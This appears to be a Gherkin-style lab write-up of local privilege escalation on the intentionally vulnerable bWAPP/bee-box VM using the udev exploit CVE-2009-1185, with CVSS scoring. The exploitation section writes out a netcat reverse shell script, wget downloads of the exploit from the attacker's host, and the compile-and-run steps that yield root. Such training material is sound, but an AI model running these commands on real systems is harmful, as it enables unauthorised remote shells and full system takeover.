## Version 1.4.1
## language: en

Feature:
  TOE:
    bWAPP
  Category:
    Injection
  Location:
    http://192.168.0.54/bWAPP/sm_local_priv_esc_2.php - udev
  CWE:
    CWE-20: Improper Input Validation
  Rule:
    REQ.186: https://fluidattacks.com/web/rules/186/
  Goal:
    Get the bee-box root
  Recommendation:
    Upgrade to a secure version

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | kali linux      | 2019.1      |
    | Mozilla Firefox | 60.4.0      |
    | Metasploit      | 5.0.2       |
  TOE information:
    Given I am running bWAPP on a beebox VM via VirtualBox on http://bWAPP
    And The url is "http://bWAPP/sm_local_priv_esc_2.php"
    Then I access the application with my broswer
    And I login the application with credentials "bee-bug"

  Scenario: Normal use case
  The application gives me a public exploit
    Given I access the following URL
    """
    http://192.168.0.54/bWAPP/sm_local_priv_esc_2.php
    """
    And I see the following text
    """
    The Linux kernel is vulnerable to a local privilege
    attack. Get r00t! (bee-box only)

    HINT: a public exploit is available...
    """
    When I click on the word exploit
    Then Exploit download begins
    And I get the exploit "cve-2009-1185.c"

  Scenario: Static detection
  No code available for this vulnerability

  Scenario: Dynamic detection
  The target is running linux kernel 2.6.24
    Given The bee-box IP is "192.168.0.54"
    And I uploaded a shell using command injection
    Then I verify the user in the shell
    """
    whoami
    www-data
    """
    And I use the following command to get the version from the kernel
    """
    uname -a
    """
    And I get the following information
    """
    Linux bee-box 2.6.24-16-generic
    """
    Then This version from kernel is vulnerable to escalation of privilege

  Scenario: Exploitation
  Escalate privileges using the exploit
    Given My machine's local IP
    """
    192.168.0.22
    """
    And I created a file that will execute the shell using netcat
    """
    #!/bin/sh
    /bin/netcat -e /bin/sh 192.168.0.22
    """
    And I save it as "run"
    And I configure a listening port on my machine using netcat
    """
    netcat -lvp 4321
    """
    Then I use a shell that has no administrative privileges
    And I'm going to the directory "/tmp"
    Then I transfer the following files to the bee-box machine
    """
    wget http://192.168.0.22/cve-2009-1185.c
    wget http://192.168.0.22/run
    """
    Then I compile the exploit
    """
    gcc cve-2009-1185 -o exploit
    """
    And I look for the PID of the udevd process
    """
    cat /proc/net/netlink
    """
    And I execute the exploit using the PID
    """
    ./exploit 2479
    """
    Then I get a shell with administrative privileges[evidence](privilege.png)

  Scenario: Remediation
  No code available for this vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.4/10 (high) - AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    7.8/10 (high) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    7.8/10 (high) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-07-23
